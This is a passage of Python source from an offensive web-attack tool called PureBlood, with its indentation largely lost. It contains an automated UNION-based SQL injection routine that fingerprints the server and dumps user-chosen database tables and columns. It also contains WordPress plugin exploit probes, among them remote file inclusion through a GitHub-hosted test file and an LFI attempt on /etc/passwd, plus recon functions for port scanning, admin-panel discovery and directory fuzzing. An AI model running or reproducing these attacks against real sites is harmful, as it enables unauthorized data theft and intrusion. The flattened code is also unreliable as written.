auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
break
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
auto_sql_injection_request_iii = auto_sql_injection_request_iii.replace(str(auto_sql_injection_request_ii) + ',' + str(auto_sql_injection_request_ii) + ',', str(auto_sql_injection_request_ii))
print ('')
print ('{2}[{1}#{2}] {3}- {4}Please put "-" after "=". Example: =-1337{0}'.format(reset + bold, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('Target> '))
if sys.version_info[0] == 2:
target = str(raw_input('Target> '))
print ('')
if 'http://' in target:
url = target
hostname = target.replace('http://', '')
elif 'https://' in target:
url = target
hostname = target.replace('https://', '')
if '://' not in target:
url = 'http://' + target
hostname = target
print ('[~] - Finding Vulnerable Column:')
auto_sql_injection_request_vulncolumn = requests.get('{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii))
auto_sql_injection_request_vulncolumn_soup = BeautifulSoup(auto_sql_injection_request_vulncolumn.content, 'html.parser')
            auto_sql_injection_request_vulncolumn_nums = re.findall(r'\d+', str(auto_sql_injection_request_vulncolumn_soup))
auto_sql_injection_request_vulncolumn_possible_vulncolumn = []
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_nums:
if len(i) < 2:
auto_sql_injection_request_vulncolumn_possible_vulncolumn.append(i)
if i == 0:
pass
auto_sql_injection_request_vulncolumn_possible_vulncolumn = list(set(auto_sql_injection_request_vulncolumn_possible_vulncolumn))
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_possible_vulncolumn:
print ('\tTrying -> {0}'.format(str(i)))
auto_sql_injection_request_dios_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + i + ',', ',' + dios1 + ',')
auto_sql_injection_request_dios = requests.get(auto_sql_injection_request_dios_url)
if 'Table:' in auto_sql_injection_request_dios.text and 'id="PureBlood"' in auto_sql_injection_request_dios.text:
auto_sql_injection_request_dios_soup = BeautifulSoup(auto_sql_injection_request_dios.content, 'html.parser')
auto_sql_injection_request_dios_url = auto_sql_injection_request_dios_url
auto_sql_injection_request_vulncolumn_column = i
break
if not auto_sql_injection_request_vulncolumn_column:
print ('[!] - Not Vulnerable!')
print ('')
web_application_attack()
print ('[+] - Vulnerable Column: {0}'.format(str(auto_sql_injection_request_vulncolumn_column)))
auto_sql_injection_request_hostname_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_hostname + ',')
auto_sql_injection_request_tmpdir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_tmpdir + ',')
auto_sql_injection_request_datadir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_datadir + ',')
auto_sql_injection_request_version_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_version + ',')
auto_sql_injection_request_basedir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_basedir + ',')
auto_sql_injection_request_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_user + ',')
auto_sql_injection_request_database_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_database + ',')
auto_sql_injection_request_schema_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_schema + ',')
auto_sql_injection_request_uuid_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_uuid + ',')
auto_sql_injection_request_system_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_system_user + ',')
auto_sql_injection_request_session_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_session_user + ',')
auto_sql_injection_request_symlink_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_symlink + ',')
auto_sql_injection_request_ssl_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_ssl + ',')
auto_sql_injection_request_hostname = requests.get(auto_sql_injection_request_hostname_url)
auto_sql_injection_request_tmpdir = requests.get(auto_sql_injection_request_tmpdir_url)
auto_sql_injection_request_datadir = requests.get(auto_sql_injection_request_datadir_url)
auto_sql_injection_request_version = requests.get(auto_sql_injection_request_version_url)
auto_sql_injection_request_basedir = requests.get(auto_sql_injection_request_basedir_url)
auto_sql_injection_request_user = requests.get(auto_sql_injection_request_user_url)
auto_sql_injection_request_database = requests.get(auto_sql_injection_request_database_url)
auto_sql_injection_request_schema = requests.get(auto_sql_injection_request_schema_url)
auto_sql_injection_request_uuid = requests.get(auto_sql_injection_request_uuid_url)
auto_sql_injection_request_system_user = requests.get(auto_sql_injection_request_system_user_url)
auto_sql_injection_request_session_user = requests.get(auto_sql_injection_request_session_user_url)
auto_sql_injection_request_symlink = requests.get(auto_sql_injection_request_symlink_url)
auto_sql_injection_request_ssl = requests.get(auto_sql_injection_request_ssl_url)
sqli_hostname_soup = BeautifulSoup(auto_sql_injection_request_hostname.text, 'html.parser')
sqli_tmpdir_soup = BeautifulSoup(auto_sql_injection_request_tmpdir.text, 'html.parser')
sqli_datadir_soup = BeautifulSoup(auto_sql_injection_request_datadir.text, 'html.parser')
sqli_version_soup = BeautifulSoup(auto_sql_injection_request_version.text, 'html.parser')
sqli_basedir_soup = BeautifulSoup(auto_sql_injection_request_basedir.text, 'html.parser')
sqli_user_soup = BeautifulSoup(auto_sql_injection_request_user.text, 'html.parser')
sqli_database_soup = BeautifulSoup(auto_sql_injection_request_database.text, 'html.parser')
sqli_schema_soup = BeautifulSoup(auto_sql_injection_request_schema.text, 'html.parser')
sqli_uuid_soup = BeautifulSoup(auto_sql_injection_request_uuid.text, 'html.parser')
sqli_system_user_soup = BeautifulSoup(auto_sql_injection_request_system_user.text, 'html.parser')
sqli_session_user_soup = BeautifulSoup(auto_sql_injection_request_session_user.text, 'html.parser')
sqli_symlink_soup = BeautifulSoup(auto_sql_injection_request_symlink.text, 'html.parser')
sqli_ssl_soup = BeautifulSoup(auto_sql_injection_request_ssl.text, 'html.parser')
sqli_hostname = sqli_hostname_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_tmpdir = sqli_tmpdir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_datadir = sqli_datadir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_version = sqli_version_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_basedir = sqli_basedir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_user = sqli_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_database = sqli_database_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_schema = sqli_schema_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_uuid = sqli_uuid_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_system_user = sqli_system_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_session_user = sqli_session_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_symlink = sqli_symlink_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_ssl = sqli_ssl_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
print ('[+] Hostname: {0}'.format(sqli_hostname))
print ('[+] TMP Directory: {0}'.format(sqli_tmpdir))
print ('[+] Data Directory: {0}'.format(sqli_datadir))
print ('[+] Database Version: {0}'.format(sqli_version))
print ('[+] Base Directory: {0}'.format(sqli_basedir))
print ('[+] Current User: {0}'.format(sqli_user))
print ('[+] Current Database: {0}'.format(sqli_database))
print ('[+] Current Schema: {0}'.format(sqli_schema))
print ('[+] System UUID Key: {0}'.format(sqli_uuid))
print ('[+] Current System User: {0}'.format(sqli_system_user))
print ('[+] Session User: {0}'.format(sqli_session_user))
            print ('[+] Is Symlink Enabled?: {0}'.format(sqli_symlink))
print ('[+] Is SSL Enabled?: {0}'.format(sqli_ssl))
print ('')
print ('[~] Dumping Database:')
auto_sql_injection_request_dios_soup_pureblood_list = []
auto_sql_injection_request_dios_soup_pureblood = auto_sql_injection_request_dios_soup.findAll('strong', attrs={'id': 'PureBlood'})
for i in auto_sql_injection_request_dios_soup_pureblood:
if i.text in auto_sql_injection_request_dios_soup_pureblood_list:
pass
else:
auto_sql_injection_request_dios_soup_pureblood_list.append(i.text)
for i in auto_sql_injection_request_dios_soup_pureblood_list:
print ('\t{0}'.format(i))
print ('')
sqli_table = ''
user_choice = ''
sqli_column = []
print ('{2}[{1}#{2}] {3}- {4}Just enter exit/done if you want to start dumping{0}'.format(reset + bold, green, blue, yellow, cyan))
while True:
if sys.version_info[0] == 3:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(input('Table> '))
sqli_table = user_choice1
user_choice = str(input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
if sys.version_info[0] == 2:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(raw_input('Table> '))
sqli_table = user_choice1
user_choice = str(raw_input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
print ('')
print ('[~] Dumping Columns:')
for i in sqli_column:
auto_sql_injection_request_column_dump_list = []
auto_sql_injection_request_column_dump_url = '{0}{1} /*!50000Union*/ all select {2} from {3}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii, sqli_table)
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_dump_column_payload + ',')
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace('<column>', i)
auto_sql_injection_request_column_dump = requests.get(auto_sql_injection_request_column_dump_url)
auto_sql_injection_request_column_dump_soup = BeautifulSoup(auto_sql_injection_request_column_dump.text, 'html.parser')
auto_sql_injection_request_column_dump_soup_pureblood = auto_sql_injection_request_column_dump_soup.find_all('strong', attrs={'id': 'PureBloodINFO'})
for ii in auto_sql_injection_request_column_dump_soup_pureblood:
if ii.text in auto_sql_injection_request_column_dump_list:
pass
elif ii.text not in auto_sql_injection_request_column_dump_list:
auto_sql_injection_request_column_dump_list.append(ii.text)
for iii in auto_sql_injection_request_column_dump_list:
print ('\t{0} -> {1}'.format(i, iii))
def wordpress_vulnerability_check(self, wvc_url):
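        """Check the target for a handful of known WordPress plugin issues:
        WooCommerce directory traversal, WP Booking Calendar SQLi/XSS,
        WP with Spritz RFI/LFI and Events Calendar 'event_id' SQL injection."""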
        print ('[#] - Checking (WordPress WooCommerce - Directory Traversal):')
wp_woocommerce_wvc_url = ''
wp_woocommerce = requests.get(wvc_url + '/wp-content/plugins/woocommerce/templates/emails/plain')
wp_woocommerce_wvc_url = wvc_url + '/wp-content/plugins/woocommerce/templates/emails/plain'
if wp_woocommerce.status_code == 200:
print ('\t[+] - Vulnerable! ~ ' + wp_woocommerce_wvc_url)
elif wp_woocommerce.status_code == 301:
print ('\t[!] - Redirected! ~ ' + wp_woocommerce_wvc_url)
elif wp_woocommerce.status_code == 403:
print ('\t[!] - Forbidden! ~ ' + wp_woocommerce_wvc_url)
else:
            print ('\t[!] - 404 Not Found! ~ ' + wp_woocommerce_wvc_url)
print ('\n\n[#] - Checking (Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting):')
wp_plugin_booking_calendar_wvc_url = ''
wp_plugin_booking_calendar = requests.get(wvc_url + '/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php')
if wp_plugin_booking_calendar.status_code == 200:
wp_plugin_booking_calendar = wp_plugin_booking_calendar
wp_plugin_booking_calendar_wvc_url = wvc_url + '/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
elif wp_plugin_booking_calendar.status_code == 404:
wp_plugin_booking_calendar = requests.get(wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php')
if wp_plugin_booking_calendar.status_code == 200:
wp_plugin_booking_calendar = wp_plugin_booking_calendar
wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
else:
wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
wp_plugin_booking_calendar = 'Not Found'
if wp_plugin_booking_calendar == 'Not Found':
wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
            print ('\t[!] - 404 Not Found! ~ ' + wp_plugin_booking_calendar_wvc_url)
else:
print ('\t[+] - XSS Maybe Vulnerable! ~ ' + wp_plugin_booking_calendar_wvc_url + '?month=<XSS Payload>')
print ('\t[+] - SQLMap Maybe Vulnerable! ~ ' + wp_plugin_booking_calendar_wvc_url + '?month=')
            print ('\t[!] - Automatic confirmation is not supported (JavaScript alerts would need Selenium); verify the XSS and run SQLMap against the URL above manually')
print ('\n\n[#] - Checking (WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion):')
wp_plugin_wp_spritz_wvc_url = ''
wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php')
if wp_plugin_wp_spritz.status_code == 200:
            wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://raw.githubusercontent.com/cr4shcod3/pureblood/master/l33t/rfi.txt')
            wp_plugin_wp_spritz_wvc_url = wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://raw.githubusercontent.com/cr4shcod3/pureblood/master/l33t/rfi.txt'
if 'PureBlood RFI ~Cr4sHCoD3' in wp_plugin_wp_spritz.text:
print ('\t[+] - Vulnerable! ~ ' + wp_plugin_wp_spritz_wvc_url)
                wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/passwd')
if wp_plugin_wp_spritz.status_code == 403 or wp_plugin_wp_spritz.status_code == 400:
                    print ('\t[+] - Try to bypass LFI! ~ ' + wp_plugin_wp_spritz_wvc_url)
elif 'The page you are trying to access is restricted due to a security rule.' in wp_plugin_wp_spritz.text:
                    print ('\t[+] - Try to bypass LFI! ~ ' + wp_plugin_wp_spritz_wvc_url)
elif wp_plugin_wp_spritz.status_code == 404:
wp_plugin_wp_spritz_wvc_url = wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php'
            print ('\t[!] - 404 Not Found! ~ ' + wp_plugin_wp_spritz_wvc_url)
print ('\n\n[#] - Checking (WordPress Plugin Events Calendar - \'event_id\' SQL Injection):')
wp_plugin_events_calendar_wvc_url = ''
wp_plugin_events_calendar = requests.get(wvc_url + '/event.php?event_id=1')
if wp_plugin_events_calendar.status_code == 200:
wp_plugin_events_calendar_result = ''
wp_plugin_events_calendar = requests.get(wvc_url + '/event.php?event_id=1\'')
wp_plugin_events_calendar_wvc_url = wvc_url + '/event.php?event_id=1\''
for db, errors in dbms_errors.items():
for error in errors:
if re.compile(error).search(wp_plugin_events_calendar.text):
wp_plugin_events_calendar_result = 'Vulnerable'
print ('\t[+] - ' + db + ' Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
if wp_plugin_events_calendar_result == '':
print ('\t[!] - Not Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
elif wp_plugin_events_calendar.status_code == 404:
wp_plugin_events_calendar = requests.get(wvc_url + '/view-event.php?event_id=1')
wp_plugin_events_calendar_wvc_url = wvc_url + '/view-event.php?event_id=1'
if wp_plugin_events_calendar.status_code == 200:
wp_plugin_events_calendar_result = ''
wp_plugin_events_calendar = requests.get(wvc_url + '/view-event.php?event_id=1\'')
wp_plugin_events_calendar_wvc_url = wvc_url + '/view-event.php?event_id=1\''
for db, errors in dbms_errors.items():
for error in errors:
if re.compile(error).search(wp_plugin_events_calendar.text):
wp_plugin_events_calendar_result = 'Vulnerable'
print ('\t[+] - ' + db + ' Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
if wp_plugin_events_calendar_result == '':
print ('\t[!] - Not Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
elif wp_plugin_events_calendar.status_code == 404:
                print ('\t[!] - 404 Not Found! ~ ' + wp_plugin_events_calendar_wvc_url)
class WebPentest:
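    """Reconnaissance helpers: banner grabbing, whois, traceroute, DNS records,
    reverse DNS/IP lookups, zone transfer checks, port scanning, admin panel and
    subdomain discovery, CMS detection, link extraction, directory/file fuzzing
    and Shodan queries."""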
def banner_grab(self, bg_url):
banner_grab_request = requests.get(bg_url)
banner_grab_result = banner_grab_request.headers
banner_grab_result = str(banner_grab_result).replace("{'", "").replace("'}", "").replace("': '", ": ").replace("', '", ",\n")
self.banner_grab_result = banner_grab_result
return self.banner_grab_result
def whois(self, w_url):
whois_query = whois.whois(w_url)
self.whois_result = whois_query
return self.whois_result
def traceroute(self, t_hostname):
traceroute_request = requests.get('https://api.hackertarget.com/mtr/?q=' + t_hostname)
traceroute_response = traceroute_request.text
traceroute_final = """{0}""".format(str(traceroute_response))
self.traceroute_result = traceroute_final
return self.traceroute_result
def dns_record(self, dr_hostname):
dns_record_list = []
for i in ids:
t = threading.Thread(target=dns_record_scanner, args=(dr_hostname, i, dns_record_list, ))
t.start()
t.join()
self.dns_record_result = dns_record_list
return self.dns_record_result
def reverse_dns_lookup(self, rdl_ip):
rdl_ip = rdl_ip + '/24'
reverse_dns_lookup_request = requests.get('https://api.hackertarget.com/reversedns/?q=' + rdl_ip)
reverse_dns_lookup_response = reverse_dns_lookup_request.text
reverse_dns_lookup_final = """{0}""".format(str(reverse_dns_lookup_response))
self.reverse_ip_lookup_result = reverse_dns_lookup_final
return self.reverse_ip_lookup_result
def zone_transfer_lookup(self, ztl_hostname):
zone_transfer_lookup_request = requests.get('https://api.hackertarget.com/zonetransfer/?q=' + ztl_hostname)
zone_transfer_lookup_response = zone_transfer_lookup_request.text
zone_transfer_lookup_final = """{0}""".format(str(zone_transfer_lookup_response))
self.zone_transfer_lookup_result = zone_transfer_lookup_final
return self.zone_transfer_lookup_result
def port_scan(self, ps_hostname, ps_pend): #https://stackoverflow.com/a/38210023
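        """Attempt a TCP connect to every port from 0 to ps_pend (one thread per
        port) and return the ones reported as 'Open'."""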
port_scan_list = []
threads = []
output = {}
delay = 10
for i in range(ps_pend + 1):
t = threading.Thread(target=TCP_connect, args=(ps_hostname, i, delay, output))
threads.append(t)
for i in range(ps_pend + 1):
threads[i].start()
for i in range(ps_pend + 1):
threads[i].join()
for i in range(ps_pend + 1):
if output[i] == 'Open':
port_scan_list.append('[+] Port Open - ' + str(i))
self.port_scan_result = port_scan_list
return self.port_scan_result
def admin_panel_scan(self, ads_url):
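        """Look for an admin panel: collect paths from robots.txt (Allow/Disallow)
        and from the admin_panel_list wordlist, flag responses containing
        login-related keywords, and fall back to opening a Google dork in the
        browser when nothing matches."""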
admin_panel_valid = []
admin_panel_redirect = []
ads_urls = []
r_path = []
ads_r_urls = []
robots = ['/robot.txt', '/robots.txt']
for i in admin_panel_list:
ads_urls.append(ads_url + i)
for i in robots:
r_robots = requests.get(ads_url + i)
if r_robots.status_code == 200:
r_robots = r_robots
else:
r_robots = ''
if r_robots == '':
pass
else:
robots = str(r_robots.text)
for i in robots.split("\n"):
if i.startswith('Allow'):
r_path.append(i.split(': ')[1].split(' ')[0])
elif i.startswith('Disallow'):
r_path.append(i.split(': ')[1].split(' ')[0])
for i in r_path:
ads_r_urls.append(ads_url + i)
for i in ads_r_urls:
ads_r_urls_request = requests.get(i)
if 'Admin' in ads_r_urls_request.text or 'Login' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
elif 'admin' in ads_r_urls_request.text or 'login' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
elif 'Username' in ads_r_urls_request.text or 'Password' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
elif 'username' in ads_r_urls_request.text or 'password' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
else:
r_admin_panel = None
if not admin_panel_valid:
for i in ads_urls:
admin_scan_request = requests.get(i)
if admin_scan_request.status_code == 200:
admin_panel_valid.append(i)
break
elif admin_scan_request.status_code == 301 or admin_scan_request.status_code == 302:
admin_panel_redirect.append(i)
else:
pass
admin_panel_valid = list(set(admin_panel_valid))
for i in admin_panel_redirect:
admin_panel_valid.append(i + ' - 301')
if not admin_panel_valid:
webbrowser.open_new_tab(google_hacking + 'site:' + ads_url + '+inurl:login | admin | user | cpanel | account | moderator | phpmyadmin | /cp')
self.admin_panel_scan_result = admin_panel_valid
return self.admin_panel_scan_result
def subdomain_scan(self, ss_hostname, subdomain_list):
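        """Prefix each word in subdomain_list to the hostname and probe it in a
        thread, grouping results by HTTP status code (200/301/302/403)."""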
so_200 = []
so_301 = []
so_302 = []
so_403 = []
ss_urls = []
ss_subdomain_list = open(subdomain_list, 'r')
ss_subdomain_list = ss_subdomain_list.read().splitlines()
for i in ss_subdomain_list:
ss_urls.append(i + '.' + ss_hostname)
for i in ss_urls:
t = threading.Thread(target=subdomain_scanner, args=(i, so_200, so_301, so_302, so_403,))
t.start()
t.join()
self.ss_200_result = so_200
self.ss_301_result = so_301
self.ss_302_result = so_302
self.ss_403_result = so_403
return self.ss_200_result, self.ss_301_result, self.ss_302_result, self.ss_403_result
def cms_detect(self, cd_hostname):
cd_cms = []
cd_cms_version = []
cms_detect_request = requests.get('https://whatcms.org/?s=' + cd_hostname)
cd_soup = BeautifulSoup(cms_detect_request.content, 'html.parser')
cd_soup_div = cd_soup.find('div', attrs={'class': 'large text-center'})
for i in cd_soup_div.find_all('span', attrs={'class': 'nowrap'}):
cd_cms_version.append(i.text)
cd_cms.append(cd_soup_div.find('a').text)
if not cd_cms:
cms_detect_final = '[!] - There\'s no CMS Detected!'
else:
cd_cms_version = cd_cms_version[1]
cms_detect_final = cd_cms[0].replace('/c/', '')
cms_detect_final = cms_detect_final + ' - ' + cd_cms_version
self.cms_detect_result = cms_detect_final
return self.cms_detect_result
def reverse_ip_lookup(self, ril_hostname):
reverse_ip_lookup_request = requests.get('https://api.hackertarget.com/reverseiplookup/?q=' + ril_hostname)
reverse_ip_lookup_response = reverse_ip_lookup_request.text
reverse_ip_lookup_final = """{0}""".format(str(reverse_ip_lookup_response))
self.reverse_ip_lookup_result = reverse_ip_lookup_final
return self.reverse_ip_lookup_result
def subnet_lookup(self, subnet_input):
subnet_lookup_request = requests.get('https://api.hackertarget.com/subnetcalc/?q=' + subnet_input)
subnet_lookup_response = subnet_lookup_request.text
subnet_lookup_final = """{0}""".format(str(subnet_lookup_response))
self.subnet_lookup_result = subnet_lookup_final
return self.subnet_lookup_result
def links_extract(self, le_url):
links_extract_request = requests.get('https://api.hackertarget.com/pagelinks/?q=' + le_url)
links_extract_response = links_extract_request.text
links_extract_final = """{0}""".format(str(links_extract_response))
self.links_extract_result = links_extract_final
return self.links_extract_result
def directory_fuzz(self, df_url, directory_list):
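        """Request every path from directory_list under df_url (one thread per
        path) and let directory_scanner sort the hits into three result lists."""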
directory_fuzz_final1 = []
directory_fuzz_final2 = []
directory_fuzz_final3 = []
directory_list_open = open(directory_list, 'r')
directory_list = directory_list_open.read().splitlines()
df_url_list = []
ii = 0
for i in directory_list:
if '/' in directory_list[ii]:
df_url_list.append(df_url + i)
else:
df_url_list.append(df_url + '/' + i)
ii = ii + 1
for i in df_url_list:
print (i)
t = threading.Thread(target=directory_scanner, args=(i, directory_fuzz_final1, directory_fuzz_final2, directory_fuzz_final3))
t.start()
t.join()
self.directory_fuzz_result1 = directory_fuzz_final1
self.directory_fuzz_result2 = directory_fuzz_final2
self.directory_fuzz_result3 = directory_fuzz_final3
        return self.directory_fuzz_result1, self.directory_fuzz_result2, self.directory_fuzz_result3
def file_fuzz(self, ff_url, file_list):
file_fuzz_final1 = []
file_fuzz_final2 = []
file_fuzz_final3 = []
file_list_open = open(file_list, 'r')
file_list = file_list_open.read().splitlines()
ff_url_list = []
for i in file_list:
ff_url_list.append(ff_url + '/' + i)
for i in ff_url_list:
t = threading.Thread(target=file_scanner, args=(i, file_fuzz_final1, file_fuzz_final2, file_fuzz_final3))
t.start()
t.join()
self.file_fuzz_result1 = file_fuzz_final1
self.file_fuzz_result2 = file_fuzz_final2
self.file_fuzz_result3 = file_fuzz_final3
return self.file_fuzz_result1, self.file_fuzz_result2, self.file_fuzz_result3
def shodan_search(self, query, ss_SHODAN_API_KEY):
shodan_api = shodan.Shodan(ss_SHODAN_API_KEY)
try:
shodan_search_results = shodan_api.search(query)
self.shodan_search_result = shodan_search_results
return self.shodan_search_result
except shodan.APIError as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
web_pentest()
def shodan_host_lookup(self, shodan_host, shl_SHODAN_API_KEY):
shodan_api = shodan.Shodan(shl_SHODAN_API_KEY)
try:
shodan_host_lookup_results = shodan_api.host(shodan_host)
self.shodan_host_lookup_result = shodan_host_lookup_results
return self.shodan_host_lookup_result
except shodan.APIError as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
web_pentest()
def clear():
    # 'cls' on Windows; every other platform (Linux, macOS, ...) uses 'clear'.
    if platform.system() == 'Windows':
        os.system('cls')
    else:
        os.system('clear')
def banner():
try:
if sys.version_info[0] == 3:
banner = ("""{1}
██▓███ █ ██ ██▀███ ▓█████ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓██░ ██▒ ██ ▓██▒▓██ ▒ ██▒▓█ ▀ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▓██░ ██▓▒▓██ ▒██░▓██ ░▄█ ▒▒███ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██▄█▓▒ ▒▓▓█ ░██░▒██▀▀█▄ ▒▓█ ▄ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
▒██▒ ░ ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
▒▓▒░ ░ ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
{2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold))
elif sys.version_info[0] == 2:
banner = ("""{1}
██▓███ █ ██ ██▀███ ▓█████ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓██░ ██▒ ██ ▓██▒▓██ ▒ ██▒▓█ ▀ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▓██░ ██▓▒▓██ ▒██░▓██ ░▄█ ▒▒███ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██▄█▓▒ ▒▓▓█ ░██░▒██▀▀█▄ ▒▓█ ▄ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
▒██▒ ░ ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
